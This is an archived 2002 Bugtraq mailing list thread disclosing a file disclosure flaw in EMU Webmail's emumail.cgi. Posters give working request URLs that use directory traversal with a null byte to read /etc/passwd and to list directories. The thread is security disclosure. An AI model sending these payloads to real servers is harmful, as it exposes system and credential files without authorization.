Bugtraq mailing list archives

Re: emumail.cgi

From: "MegaHz" <admin () cyhackportal com>
Date: Sat, 6 Apr 2002 15:39:15 +0300

u can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00

but u cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

/* 
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */


----- Original Message ----- 
From: "N|ghtHawk" <nighthawk () hackers4hackers nl>
To: <bugtraq () securityfocus org>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi

name            : emumail.cgi
date            : 04/04/2002
description     : EMU Webmail: how to check your email
from the web. 
severity        : Low/average-risk
homepage        : www.emumail.com

Any user can view files on the remote system:
xxx/PATH/emumail.cgi?type=FILE%00



The vendor were contact about that


http://site/emumail.cgi?type=.%00

Seems to give the directory index of the current directory.

http://site/emumail.cgi?type=..%00

Seems to give the directory index of ../

-- 
N|ghtHawk
http://www.hackers4hackers.org

Current thread:

emumail.cgi acidneo (Apr 04)
- Re: emumail.cgi Tom Micklovitch (Apr 05)
- Re: emumail.cgi, one more local vulnerability (not verified) Leif Jakob (Apr 10)
- <Possible follow-ups>
- Re: emumail.cgi N|ghtHawk (Apr 05)
  - Re: emumail.cgi MegaHz (Apr 08)
    - Re: emumail.cgi Randal L. Schwartz (Apr 09)